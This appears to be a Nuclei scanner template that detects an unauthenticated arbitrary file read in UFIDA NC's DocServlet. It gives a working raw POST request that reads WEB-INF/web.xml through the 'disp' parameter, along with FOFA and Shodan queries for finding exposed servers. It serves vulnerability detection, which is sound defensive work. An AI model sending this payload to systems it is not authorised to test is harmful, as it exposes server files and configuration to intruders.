id: yonyou-nc-lfi

info:
  name: UFIDA NC - Arbitrary File Read
  author: vva
  severity: high
  description: |
    UFIDA NC is vulnerable to an arbitrary file read vulnerability in the nc.uap.lfw.file.action.DocServlet component. An unauthenticated remote attacker can exploit this flaw to read sensitive files on the server by sending crafted requests.
  impact: |
    Successful exploitation allows attackers to access sensitive files and information stored on the server.
  reference:
    - https://github.com/szjr123/Target-practice/blob/05ed667090d8040a09235826f7698ff5347a93cf/%E7%94%A8%E5%8F%8BOA/NC%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96_DocServlet/yongyou_read.py
  metadata:
    verified: true
    # One POST per target; the template sends no follow-up requests.
    max-request: 1
    fofa-query: 'app="用友-UFIDA-NC"'
    shodan-query: 'http.title:"用友" "NC"'
  tags: yonyou,ufida,lfi

http:
  - raw:
      # Single POST to the DocServlet endpoint. The `disp` parameter names the
      # file returned; the template asks for the application's own deployment
      # descriptor (WEB-INF/web.xml) so the matcher below has a distinctive,
      # well-known body to key on rather than an arbitrary system file.
      # For defenders: a request to this servlet path carrying a `disp=`
      # value is the pattern to alert on in access logs / WAF rules.
      - |
        POST /service/~webrt/nc.uap.lfw.file.action.DocServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        pageId=login&disp=/WEB-INF/web.xml

    # All three DSL checks must hold (condition: and): HTTP 200, an XML
    # content-type, and a body that looks like a servlet deployment
    # descriptor. Requiring both "<web-app" and the XML prolog keeps a
    # generic 200 page or an XML-formatted error response from counting
    # as a finding.
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/xml")'
          - 'contains_all(body, "<web-app", "<?xml version")'
        condition: and
# NOTE(review): the digest below is the project's signature over the template
# text, so any edit to this file (comments included) presumably needs the
# template to be re-signed with the project's tooling — confirm before relying
# on signature verification.
# digest: 4a0a004730450220353a2fd31e57e130ac664b6096f59fc396f75d59571cc90a763748efbb24cfbf022100fc79c4d5fc75a9ba204757b33bc4fb5848d413182d7e0cf9702f8b83d4b814d8:922c64590222798bb761d5b6d8e72950